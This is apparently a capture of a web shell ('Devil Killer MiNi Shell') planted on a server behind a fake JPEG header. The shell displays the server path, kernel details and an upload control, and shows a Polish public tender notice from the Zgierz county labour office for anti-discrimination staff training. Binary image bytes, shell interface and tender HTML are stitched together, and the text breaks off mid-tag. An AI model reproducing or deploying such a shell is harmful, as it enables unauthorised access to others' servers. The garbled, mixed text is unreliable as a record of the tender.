JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250807/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250807/0036581701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Szkolenie grupowe dla pracowników Powiatowego Urzędu Pracy w Zgierzu pod nazwą: „Antydyskryminacja – równościowy urząd wobec zróżnicowanych klientów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy w Zgierzu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472286002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Barona 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">427141277</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">427174160</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lozg@praca.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zgierz.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> łagodzenie skutków bezrobocia,aktywizacja zawodowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szkolenie grupowe dla pracowników Powiatowego Urzędu Pracy w Zgierzu pod nazwą: „Antydyskryminacja – równościowy urząd wobec zróżnicowanych klientów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-736cea94-bc38-4adc-aa89-c2d0cec1cffe</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00365817</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00024086/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Szkolenia i warsztaty dla pracowników PUP w Zgierzu w zakresie &#34;niedyskryminacji i zarządzania różnorodnością&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Szkolenie jest częścią projektu „STOP BARIEROM! RÓWNI W PRACY”, współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus, w ramach Programu Regionalnego Fundusze Europejskie dla łódzkiego 2021-2027, działanie FELD.07.05 „Integracja i społeczeństwo obywatelskie”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-736cea94-bc38-4adc-aa89-c2d0cec1cffe <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne<br/>3. Do kontaktu z Wykonawcami wyznaczona została Karolina Przepiórska-Tokarz, Wydział Zarządzania i Administrowania Majątkiem, nr tel. 42 714-12-74, godz. pracy 7.30 – 15.30, <br/>e -mail: przetargi@pupzgierz.pl.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia<br/>7. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie (Dz. U. z 2020 r. poz. 2452) zwanym dalej jako „rozporządzenie Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych”.<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ. <br/>12. Za datę przekazania oferty, oświadczenia o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu przyjmuje się datę ich przekazania przez platformę e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Powiatowy Urząd Pracy w Zgierzu z siedzibą przy ulicy Barona 10, kod pocztowy 95-100 Zgierz.<br/> Inspektorem ochrony danych w Powiatowym Urzędzie Pracy w Zgierzu jest Pan Michał Koralewski, kontakt e-mail: poczta@mkoralewski.pl<br/> Cele i podstawy przetwarzania<br/>Publiczne służby zatrudnienia (PSZ), które tworzy m.in. Powiatowy Urząd Pracy <br/>w Zgierzu, realizujące zadania państwa w zakresie aktywności zawodowej, wspierania zatrudnienia oraz rynku pracy (art.5, art. 9, art.38.1 w zw. z art. 39.1 ustawy z dnia 20 marca 2025 r o rynku pracy i służbach zatrudnienia, zwanej dalej ustawą), przetwarzają dane osobowe osób fizycznych w celu pełnego i produktywnego zatrudnienia; rozwoju zasobów ludzkich; wzmacniania integracji i solidarności społecznej oraz zwiększania mobilności na rynku pracy (art. 1 ust 2 ustawy). W celu realizacji zadań, o których mowa w art. 38.1 ustawy, PUP przetwarza dane osobowe osób, o których mowa w art. 47.1 ustawy. W celu realizacji zadań, w tym udzielania pomocy określonej w ustawie oraz w celu przyjęcia oferty pracy, Urząd pozyskuje dane m.in. z CEIDG, z Zakładu Ubezpieczeń Społecznych (art. 53 i 74 i 83.13 i 208.10 i 380 ustawy), Krajowego Rejestru Sądowego, Krajowego Rejestru Karnego (art. 52.1 ustawy), Kasy Rolniczego Ubezpieczenia Społecznego, Krajowej Administracji Skarbowej (art. 74 i 83.13 ustawy), z rejestru Pesel (art. 132.2 ustawy).<br/>Pani/Pana dane osobowe: <br/>• są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, <br/>tj. w celu realizacji ustawy o rynku pracy i służbach zatrudnienia oraz aktów wykonawczych do ustawy, a także ustawy z dnia 28 kwietnia 2022 r. o zasadach realizacji zadań finansowanych ze środków europejskich w perspektywie finansowej 2021-2027, zwaną dalej ustawą wdrożeniową (w szczególności art.88) w związku z rozporządzeniami Parlamentu Europejskiego i Rady (UE) 2021/1060 oraz 2021/1057 oraz ustawą z dnia 11 września 2019r. prawo zamówień publicznych, a następnie ustawy z dnia 12 marca 2022 r.(z późniejszymi zmianami, m.in.Dz.U.2024 poz.854) o pomocy obywatelom Ukrainy w związku z konfliktem zbrojnym na terytorium tego państwa a następnie dla wypełnienia obowiązku archiwizacji dokumentów wynikającego z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach; są przetwarzane zgodnie z ustawą <br/>z dnia 10 maja 2018r. o ochronie danych osobowych; w przypadku ubiegania się o udzielenie zamówienia na mocy regulaminu- na podstawie zgody.<br/>•mogą być przetwarzane w celu realizacji umowy, wykonania zadań realizowanych <br/>w interesie publicznym, do realizacji celów wynikających z prawnie uzasadnionych interesów administratora, takich jak zabezpieczenie dochodzenia roszczeń.<br/>Szczegóły w cz. XXV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">brak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ.2612.8.2025.KPT/EFS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 63760 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Szkolenie przeznaczone jest dla 48 pracowników Powiatowego Urzędu Pracy <br/>w Zgierzu.<br/>2.	Celem szkolenia jest zgłębienie wiedzy w zakresie dyskryminacji oraz pomocy osobom dyskryminowanym tak, aby zwiększyć zdolność do zatrudnienia grup w niekorzystnej sytuacji oraz promować równość szans i niedyskryminacji.<br/>3.	Szkolenie jest częścią projektu „STOP BARIEROM! RÓWNI W PRACY”, współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus, w ramach Programu Regionalnego Fundusze Europejskie dla łódzkiego 2021-2027, działanie FELD.07.05 „Integracja i społeczeństwo obywatelskie”.<br/>4.	Organizacja szkolenia:<br/>1)	Szkolenie musi zostać przeprowadzone dla nie więcej niż 48 osób <br/>w trzech grupach liczących po 16 osób (w trzech różnych terminach).<br/>2)	Łączny czas szkolenia dla jedne grupy wynosi 16 godzin dydaktycznych, co stanowi, że szkolenie musi trwać 2 dni.<br/>Łączny czas szkolenia dla wszystkich grup wynosi 48 godzin dydaktycznych.<br/>3)	Zajęcia muszą odbyć się w II kwartale 2026 r., w następujące po sobie dni robocze (poniedziałek – piątek). Konkretne terminy zostaną określone <br/>w umowie.<br/>Czas trwania szkolenia musi wynosić zarówno pierwszego, jak i drugiego dnia: 8 godzin dydaktycznych, w tym jedna przerwa trwająca 30 minut, a pozostałe dwie po 10 minut.<br/>4)	Przez godzinę dydaktyczną szkolenia Zamawiający rozumie 45 minut zegarowych. Zamawiający nie dopuszcza kumulowania przerw w szczególności na zakończenie dnia zajęć. <br/>5)	Zajęcia powinny zaczynać się:<br/>pierwszego dnia nie wcześniej niż o godz. 08:30, a kończyć nie później niż <br/>o godzinie 15:30,<br/>drugiego dnia nie wcześniej niż o godz. 08:00, a kończyć nie później niż <br/>o godzinie 15:00.<br/>6)	Szkolenie musi odbywać się na terenie województwa łódzkiego, poza powiatem zgierskim, z uwzględnieniem czasu przejazdu z m. Zgierz do miejsca, w którym odbywać się będzie szkolenie, max. w 60 min. Sala dydaktyczna musi się znajdować w miejscu noclegu.<br/>7)	Wykonawca dla celów realizacji szkolenia zobowiązany jest zapewnić:<br/>	transport uczestników szkolenia (trasa: Zgierz- miejsce realizacji szkolenia)/ miejsce realizacji szkolenia-Zgierz), przez firmę posiadającą uprawnienia do świadczenia usług transportowych.<br/>	jeden nocleg w hotelu o standardzie co najmniej dwóch lub trzech gwiazdek, w pokojach dwuosobowych, <br/>	salę dydaktyczną adekwatną dla grupy 16-to osobowej, odpowiednio wyposażoną, w szczególności w rzutnik multimedialny, tablicę flipchart, z osobnymi miejscami siedzącymi dla każdego uczestnika szkolenia, z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką oraz spełniającą wszystkie wymogi określone przepisami z zakresu BHP, a także dostosowaną do potrzeb osób z niepełnosprawnością oraz osób 55+, przez to rozumie się m.in. standard architektoniczny budynku, w którym będą odbywały się zajęcia szkoleniowe (winda, przystosowane toalety, miejsce parkingowe dla osób niepełnosprawnych), a także dostosowanie tempa szkolenia do potrzeb uczestników (łatwy, zrozumiały język, dostosowana wielkość czcionki wyświetlanych materiałów),<br/>Sala dydaktyczna musi się znajdować w miejscu noclegu.<br/>	ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków.<br/>8)	Wykonawca musi dysponować odpowiednią kadrą dydaktyczną, posiadającą doświadczenie w prowadzeniu szkoleń o tematyce związanej z dyskryminacją/ przeciwdziałaniem dyskryminacji, co ma na celu prawidłową i terminową realizację szkolenia oraz zapewnienie jego wysokiej jakości.<br/>9)	Wykonawca zobowiązany jest do uruchomienia szkolenia w terminie wyznaczonym przez Zamawiającego.<br/>10)	Termin zakończenia realizacji całości zamówienia: 10 lipca 2026 roku.<br/>5.	Program szkolenia<br/>1)	Szkolenie (zajęcia szkoleniowe) musi odbywać się w formie warsztatowej (10 godzin dydaktycznych), a w formie wykładu interaktywnego, <br/>z zastosowaniem form dyskusji, case study (6 godzin dydaktycznych), realizowanych według planu nauczania. W ramach 16 godzin musi odbyć się sprawdzenie wiedzy, o którym mowa w ust. 5 pkt. 4.<br/>2)	Program szkolenia musi zawierać: <br/>a)	nazwę i zakres szkolenia, <br/>b)	czas trwania i sposób organizacji szkolenia, <br/>c)	cele szkolenia ujęte w kategoriach efektów uczenia się z uwzględnieniem wiedzy, umiejętności,<br/>d)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej, <br/>e)	opis treści – kluczowe punkty szkolenia w zakresie poszczególnych zajęć edukacyjnych,<br/>f)	wykaz niezbędnych środków i materiałów dydaktycznych,<br/>g)	przewidziane sprawdziany/egzaminy.<br/>3)	Zakres tematyczny szkolenia musi obejmować w szczególności:<br/>1.	Tożsamość, cechy prawnie chronione, przesłanki dyskryminacji <br/>2.	Stereotypy (stereotypy pozytywne i negatywne, autostereotypizacja, zagrożenie stereotypem) <br/>3.	Uprzedzenie, dyskryminacja (bezpośrednia, pośrednia), łańcuch dyskryminacji, rodzaje dyskryminacji <br/>4.	Powstawanie mechanizmów wykluczenia prowadzących do dyskryminacji <br/>5.	Mowa nienawiści, w tym cyberprzemoc i jej przeciwdziałanie <br/>6.	Prawo antydyskryminacyjne <br/>7.	Przeciwdziałanie dyskryminacji,w szczególności w kontakcie z klientem (mowa ciała, spójny komunikat, model asertywnej odpowiedzi, komunikacja, ćwiczenie informacji zwrotnej, język wrażliwy, ćwiczenia dramowe)<br/>8.	Dobre praktyki działań antydyskryminacyjnych <br/>9.	Zasoby osobiste do podejmowania działań antydyskryminacyjnych<br/>4)	Szkolenie musi zakończyć się egzaminem ze zdobytej wiedzy. Czas trwania egzaminu (liczba godzin przeznaczonych na egzamin) musi być uwzględniony w rozkładzie godzinowym szkolenia, w ramach 16 godzin przeznaczonych na szkolenie.<br/>5)	Szkolenie powinno prowadzić do nabycia przez uczestników kompetencji zgodnie z programem szkolenia. Kompetencje zostaną sprawdzone w procesie walidacji w sposób zgodny z wymaganiami ustalonymi dla danej kompetencji, odnoszącymi się w szczególności do składających się na nią efektów uczenia się, w ramach 4 etapów weryfikacji zgodnie z Załącznikiem 2 do Wytycznych w zakresie monitorowania postępu rzeczowego realizacji programów operacyjnych na lata 2021-2027.<br/>https://wuplodz.praca.gov.pl/web/funduszeue/-/19914391-wytyczne-dotyczace- monitorowania-postepu-rzeczowego-realizacji-programow-na-lata-2021-2027 <br/>6)	Po ukończeniu szkolenia wykonawca zobowiązany jest wydać każdemu uczestnikowi szkolenia zaświadczenie (w formie papierowej) potwierdzające ukończenie szkolenia według wzoru Zamawiającego, zawierające:<br/>a)	numer z rejestru,<br/>b)	imię i nazwisko uczestnika szkolenia, <br/>c)	nazwę instytucji szkoleniowej przeprowadzającej szkolenie,<br/>d)	formę i nazwę szkolenia,<br/>e)	okres trwania szkolenia,<br/>f)	miejsce i datę wydania zaświadczenia potwierdzającego ukończenie szkolenia i uzyskanie umiejętności lub kwalifikacji,<br/>g)	tematy i wymiar godzin zajęć edukacyjnych,<br/>h)	podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.<br/>6.	Każdy uczestnik szkolenia musi otrzymać w pierwszym dniu szkolenia materiały dydaktyczne w formie elektronicznej – dokument w formacie pdf, adekwatne do treści zajęć.<br/>7.	Każdy uczestnik szkolenia musi otrzymać w pierwszym dniu szkolenia także harmonogram zajęć i bezzwrotne materiały piśmienne, takie jak teczka lub segregator, notes – format A-5 oraz długopis.<br/>8.	Wykonawca zobowiązany jest do prowadzenia przez cały czas trwania szkolenia imiennej listy obecności, listy potwierdzającej otrzymanie materiałów dydaktycznych oraz cateringu wskazanego w pkt 9, według wzoru Zamawiającego. Terminy przekazania list Zamawiającemu określi zawarta umowa szkoleniowa.<br/>9.	Wykonawca musi zapewnić każdemu uczestnikowi szkolenia<br/>a)	pierwszego dnia zajęć: <br/>	obiad składający się z dwóch ciepłych dań oraz napoju, I danie: zupa, <br/>II danie: składające się z mięsa/ryby (filet), surówki/warzyw gotowanych, dodatki w postaci ziemniaków/kaszy/ryżu /makaronu, napój: sok lub woda;<br/>	serwis kawowo-herbaciany w ramach, którego zobowiązany jest zapewnić następujące produkty spożywcze w ilości dostosowanej do liczby uczestników szkolenia: kawa z ekspresu (min. 30g/osoba) oraz kawa rozpuszczalna (min. 30g/osoba), herbata ekspresowa w torebkach ze sznurkiem – wybór smaków (min. 4 saszetki/osoba), cukier i słodzik (min.60g/osoba), mleko (min. 150 ml/osoba), cytryna (min. 50g/osoba) oraz woda mineralna niegazowana w ilości zapewniającej swobodny dostęp dla wszystkich uczestników szkolenia (min. 600 ml/osoba);<br/>	susz konferencyjny w którego skład wchodzą: kruche ciasteczka (np. z marmoladą, ziarnami, wafelki min. 250g/osoba) a także owoce (np. banany, jabłka, mandarynki) (min. 300g/osoba);<br/>	kolacja w formie bufetu.<br/>b)	drugiego dnia zajęć:<br/>	śniadanie w formie bufetu<br/>	obiad składający się z dwóch ciepłych dań oraz napoju, I danie: zupa, <br/>II danie: składające się z mięsa/ryby (filet), surówki/warzyw gotowanych, dodatki w postaci ziemniaków/kaszy/ryżu /makaronu, napój: sok lub woda;<br/>	serwis kawowo-herbaciany w ramach, którego zobowiązany jest zapewnić następujące produkty spożywcze w ilości dostosowanej do liczby uczestników szkolenia: kawa z ekspresu (min. 30g/osoba) oraz kawa rozpuszczalna (min. 30g/osoba), herbata ekspresowa w torebkach ze sznurkiem – wybór smaków (min. 4 saszetki/osoba), cukier i słodzik (min.60g/osoba), mleko (min. 150 ml/osoba), cytryna (min. 50g/osoba) oraz woda mineralna niegazowana w ilości zapewniającej swobodny dostęp dla wszystkich uczestników szkolenia (min. 600 ml/osoba);<br/>	susz konferencyjny w którego skład wchodzą: kruche ciasteczka (np. z marmoladą, ziarnami, wafelki min. 250g/osoba) a także owoce (np. banany, jabłka, mandarynki) (min. 300g/osoba); </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 